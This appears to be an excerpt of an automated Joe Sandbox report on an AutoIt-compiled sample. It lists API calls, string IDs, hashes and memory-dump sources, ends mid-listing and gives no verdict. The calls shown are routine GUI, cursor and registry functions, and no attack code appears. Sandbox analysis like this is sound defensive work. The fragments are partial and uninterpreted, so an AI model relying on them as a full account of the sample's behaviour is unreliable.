                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a592a3c9ff3319889c9d44e871ba518bf2aba1b785e04a608b31e3d8d9309851
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD019278E01109EFCB44DF98C5909AEF7B5FB48310F2085A9D809A7305D730BE41DB80
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(?), ref: 0045953B
• DeleteObject.GDI32(?), ref: 00459551
• DestroyWindow.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• GetWindowRect.USER32(00000000), ref: 00459588
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetClientRect.USER32(00000000,?), ref: 004596F8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
• GlobalLock.KERNEL32(00000000), ref: 0045978F
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• GlobalUnlock.KERNEL32(00000000), ref: 004597A5
• CloseHandle.KERNEL32(00000000), ref: 004597AC
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• GlobalFree.KERNEL32(00000000), ref: 004597E2
• CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
• SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
• ShowWindow.USER32(?,00000004), ref: 00459865
• CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• GetStockObject.GDI32(00000011), ref: 004598CD
• SelectObject.GDI32(00000000,00000000), ref: 004598D5
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
• DeleteDC.GDI32(00000000), ref: 004598F8
• _wcslen.LIBCMT ref: 00459916
• _wcscpy.LIBCMT ref: 0045993A
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
• GetDC.USER32(00000000), ref: 004599FC
• SelectObject.GDI32(00000000,?), ref: 00459A0C
• SelectObject.GDI32(00000000,00000007), ref: 00459A37
• ReleaseDC.USER32(00000000,00000000), ref: 00459A42
• MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 69173610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3217815495-966354055
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
